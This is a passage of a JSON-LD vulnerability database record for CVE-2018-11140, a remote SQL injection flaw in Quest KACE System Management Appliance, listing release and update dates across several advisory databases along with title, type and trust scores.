"id": "CNNVD-201805-1214"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-08-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-15386"
},
{
"date": "2018-05-31T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11140"
},
{
"date": "2018-07-23T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005571"
},
{
"date": "2018-05-31T20:52:06",
"db": "PACKETSTORM",
"id": "148005"
},
{
"date": "2018-05-31T18:29:00.637000",
"db": "NVD",
"id": "CVE-2018-11140"
},
{
"date": "2018-06-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1214"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-08-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-15386"
},
{
"date": "2018-07-02T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11140"
},
{
"date": "2018-07-23T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005571"
},
{
"date": "2018-07-02T15:51:15.810000",
"db": "NVD",
"id": "CVE-2018-11140"
},
{
"date": "2018-06-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1214"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1214"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Quest KACE System Management Appliance SQL Injection Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15386"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1214"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SQL injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201805-1214"
}
],
"trust": 0.6
}
}